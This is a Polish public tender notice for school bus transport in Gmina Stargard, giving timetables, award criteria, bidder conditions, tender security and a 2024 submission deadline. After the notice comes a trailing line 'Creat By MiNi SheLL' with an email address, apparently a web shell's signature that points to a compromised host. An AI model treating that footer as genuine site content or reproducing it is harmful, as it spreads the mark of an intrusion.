13:55<br/>II AUTOBUS<br/>SP Pęzino – 14:25<br/>Trzebiatów – 14:30<br/>Krąpiel – 14:35<br/>SP Pęzino – 14:45<br/><br/>SP Pęzino – 15:15<br/>Ulikowo – 15:20<br/>Golina – 15:30<br/>Barzkowice – 15:35<br/>Trzebiatów – 15:45<br/>Krąpiel – 15:50<br/><br/><br/>PRZEWOZY PIĄTEK<br/><br/>PRZYWOZY<br/><br/>I AUTOBUS<br/>Krąpiel- 7:35<br/>Trzebiatów – 7:40<br/>SP Pęzino – 7:45<br/><br/>Krąpiel – 10:15<br/>Trzebiatów – 10:20<br/>SP Pęzino – 10:25<br/><br/>II AUTOBUS<br/>Barzkowice – 7:20<br/>Golina – 7:25<br/>SP Pęzino – 7:40<br/>Ulikowo – 7:45<br/>SP Pęzino – 7:55<br/><br/>ODWOZY<br/><br/>I AUTOBUS<br/>SP Pęzino – 11:40<br/>Ulikowo – 11:45<br/>Golina – 11:55<br/>Barzkowice – 12:00<br/>SP Pęzino – 12:10<br/><br/>SP Pęzino – 12:35<br/>Trzebiatów – 12:40<br/>Krąpiel – 12:45<br/>SP Pęzino – 12:55<br/><br/><br/>SP Pęzino – 13:30<br/>Ulikowo – 13:35<br/>Golina – 13:45<br/>Barzkowice – 13:50<br/>SP Pęzino – 14:05<br/><br/>SP Pęzino – 14:25<br/>Ulikowo – 14:30<br/>Trzebiatów – 14:40<br/>Krąpiel – 14:45<br/>SP Pęzino – 14:45<br/><br/>SP Pęzino – 15:15<br/>Ulikowo – 15:20<br/>Trzebiatów – 15:30<br/>Krąpiel – 15:35<br/><br/><br/>Szacowana dzienna liczba km wg planu przewozu wynosi 150 km. Zamawiający przewiduje możliwość zmniejszenia dziennej liczby km do 140 km dziennie. Liczba km nie obejmuje dojazdu do miejsca początkowego trasy oraz zjazdu z końcowego miejsca trasy. Przewiduje się 186 dni nauki szkolnej. W ciągu roku szkolnego w dniach wolnych od zajęć dydaktycznych, a także związanych z obchodami świąt religijnych, państwowych i szkolnych Zamawiający przewiduje zmiany w planie zajęć i co za tym idzie zmniejszenie km w tych dniach. Mapę poglądową dla tej części zamówienia zawiera załącznik nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część IV. Przewozy uczniów na zajęcia pozalekcyjne, konkursy, zawody międzyszkolne, rekolekcje, jasełka, przewozy uczniów na zajęcia projektowe, granty w przypadku podpisania umowy na dofinansowanie według zapotrzebowania szkół prowadzonych przez Gminę Stargard na podstawie odrębnego rozliczenia faktycznie wykonanej usługi w oparciu o ustaloną stawkę za 1 km.<br/>Przewidywana ilość km - 1000 km. <br/>Zakładana liczba km nie obejmuje dojazdu do miejsca, w którym uczniowie wsiadają i zjazdu z miejsca, w którym uczniowie wysiadają. Przebieg trasy każdorazowo ustala Zamawiający. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu, tj. dotyczące:<br/>1)zdolności do występowaniu w obrocie gospodarczym – Zamawiający nie stawia warunku w tym zakresie – dotyczy wszystkich części zamówienia,<br/>2)uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada licencję zezwalającą na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego, zgodnie z Ustawą z dnia 6 września 2001 r. o transporcie drogowym Licencja/zezwolenie musi być ważne przez cały okres wykonywania zamówienia - dotyczy wszystkich części zamówienia<br/>3)sytuacji ekonomicznej lub finansowej- jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 500 000,00 zł- dotyczy wszystkich części zamówienia<br/>4)zdolności technicznej lub zawodowej;<br/>a)Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie zrealizował co najmniej jedną usługę polegającą na dowozie osób o wartości minimum 200 000,00 zł brutto (wartość roczna). (załącznik nr 7 do swz) – dotyczy wszystkich części zamówienia<br/>b) Warunek ten w zakresie potencjału technicznego zostanie uznany za spełniony jeżeli Wykonawca wykaże, że dysponuje: (wypełnić wg załącznika nr 5)- tj:<br/>-minimum 1 pojazdem przystosowanym (w odniesieniu do planu przewozów tj. liczba osób) do przewozu osób w części I,<br/>-minimum 1 pojazdem przystosowanym (w odniesieniu do planu przewozów tj. liczba osób ) do przewozu osób w części II,<br/>-minimum 2 pojazdami przystosowanymi (w odniesieniu do planu przewozów tj. liczba osób) do przewozu osób w części III,<br/>-minimum 2 pojazdami przystosowanymi (w odniesieniu do planu przewozów tj. liczba osób) do przewozu osób w części IV.<br/><br/>2.Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/ „nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale VII.<br/>3. Wykonawca zgodnie z art. 118 ustawy pzp może w celu potwierdzenia spełnienia warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków.<br/>4.Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca, realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania stanowi załącznik nr 4 do niniejszej SWZ.<br/>5.Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt. 4, winno potwierdzać, że łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w szczególności:<br/>1)zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2)sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3)czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, realizuje usługi, których wskazane zdolności dotyczą.<br/>6.Wykonawca w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawi, wraz z ofertą oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (sporządzone zgodnie ze wzorami stanowiącymi załączniki nr 2a i 3a do swz).<br/>7.Wykonawca, który polega na zdolnościach technicznych lub zawodowych lub sytuacji ekonomicznej lub finansowej na zasadach określonych w art. 118 PZP w zw. z art. 266 PZP zobowiązany będzie do przedstawienia podmiotowych środków dowodowych, o których mowa w rozdziale VII ust. 2 pkt 2-4 SWZ, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podstawy wykluczenia z postępowania. Dokumenty o których mowa powyżej Wykonawca będzie obowiązany złożyć na wezwanie, o którym mowa w Rozdziale VII.<br/>8.Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>9.Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>10.W przypadku, gdy Wykonawca powołuje się na zasoby podmiotu udostępniającego w celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca zamieszcza informację o tych podmiotach w formularzu oferty stanowiącym załącznik nr 1 do SWZ.<br/>11.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki udziału w postępowaniu powinni spełniać łącznie wszyscy Wykonawcy z zastrzeżeniem, iż warunek opisany w Rozdziale V pkt 1 ppkt 2 winien spełniać co najmniej jeden z tych Wykonawców.<br/><br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W przypadkach, o których mowa w zdaniach powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy Pzp). Wzór oświadczenia stanowi załącznik nr 10.<br/>12.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego <br/>13. Pełnomocnictwo, o którym mowa w ust. 12 należy dołączyć do oferty.<br/>14. Wszelką korespondencję w postępowaniu zamawiający kieruje do pełnomocnika.<br/>15. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. . Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty.<br/>16. Wspólnicy spółki cywilnej traktowani są jak wykonawcy ubiegający się wspólnie o udzielenie zamówienia publicznego.<br/>17.W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie, o którym mowa w art. 125 ustawy Pzp (załącznik nr 2 i 3) musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości:<br/>-dla części I Przewóz uczniów do i z SP Małkocin – 3000,00 zł (słownie: trzy tysiące złotych)<br/>-dla części II Przewóz uczniów do i z SP Grzędzice – 5000,00 zł (słownie: pięć tysięcy złotych)<br/>-dla części III Przewóz uczniów do i z SP Pęzino – 5000,00 zł (słownie: pięć tysięcy złotych)<br/>-dla części IV Przewozy uczniów na zajęcia pozalekcyjne, konkursy, zawody międzyszkolne, rekolekcje, jasełka, przewozy uczniów na zajęcia projektowe w przypadku podpisania umowy na dofinansowanie według zapotrzebowania szkół prowadzonych przez Gminę Stargard na podstawie odrębnego rozliczenia faktycznie wykonanej usługi w oparciu ustaloną stawkę za 1 km – 1 000,00 (jeden tysiąc złotych)<br/>2.Wadium należy wnieść przed upływem terminu składania ofert i utrzymać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 pzp.<br/>3.Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach: :<br/>1) pieniądzu - przelewem na rachunek bankowy Zamawiającego: nr 41 1240 3901 1111 0010 0489 7577(w tytule przelewu należy wpisać której części zamówienia dotyczy wniesione wadium.)<br/>2) gwarancjach bankowych;<br/>3)gwarancjach ubezpieczeniowych;<br/>4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości <br/>4. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>5. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 Pzp. <br/>6. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3 ppkt 2-4-należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej, tj. opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na daną część zamówienia przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 Pzp. <br/>7.Treść gwarancji wadialnej musi zawierać następujące elementy: <br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib, <br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia <br/>3) kwotę gwarancji/poręczenia, <br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP. <br/>8. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1-5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień zawartej umowy w stosunku do treści Oferty Wykonawcy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Strona, która występuje z propozycją zmiany umowy, zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę. Zmiany nie mogą naruszać postanowień zawartych w art. 455 ustawy Pzp. <br/>2. Dopuszczalna jest zmiana wynagrodzenia w przypadku dokonania zmiany wynagrodzenia za 1 km przewozu w przypadku zmiany przepisów o wysokości podatku VAT w taki sposób, że kwota netto pozostaje bez zmian a zmienia się wynagrodzenie brutto. <br/>3. Nie stanowi zmiany umowy:<br/>a)	zmiana liczby przewożonych osób, którym Zamawiający obowiązany jest zapewnić Usługi w okresie realizacji Umowy, w przypadku m.in. dołączenia do szkół nowych dzieci z terenu gminy Stargard;<br/>b)	zmiana przebiegu tras przejazdów, miejsc przystanków, godzin przyjazdu i odjazdu, w zakresie:<br/>-niezbędnym do zapewnienia transportu na warunkach przewidzianych w Umowie dla zmienionej liczby przewożonych osób,<br/>-uwzględniającym wystąpienie w trakcie realizacji Umowy nieprzewidzianych utrudnień w ruchu drogowym, takich jak: remont, przebudowa drogi, wyłączenia z ruchu, zmiany organizacji ruchu i tym podobne;<br/>4. Nie stanowi zmiany umowy zmiana danych teleadresowych. <br/>5. Nie stanowi zmiany umowy zmiana osób skierowanych do realizacji umowy jeżeli, spełniają warunki określone przez Zamawiającego w postępowaniu .<br/>6. Wystąpienie którejkolwiek z okoliczności mogących powodować zmianę Umowy, nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania zmian ani nie może stanowić samodzielnej podstawy do jakichkolwiek roszczeń Wykonawcy do ich dokonania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/all?query=O%C5%9Brodek%20Administracyjny%20Szk%C3%B3%C5%82%20Gminy%20Stargard</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-07 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com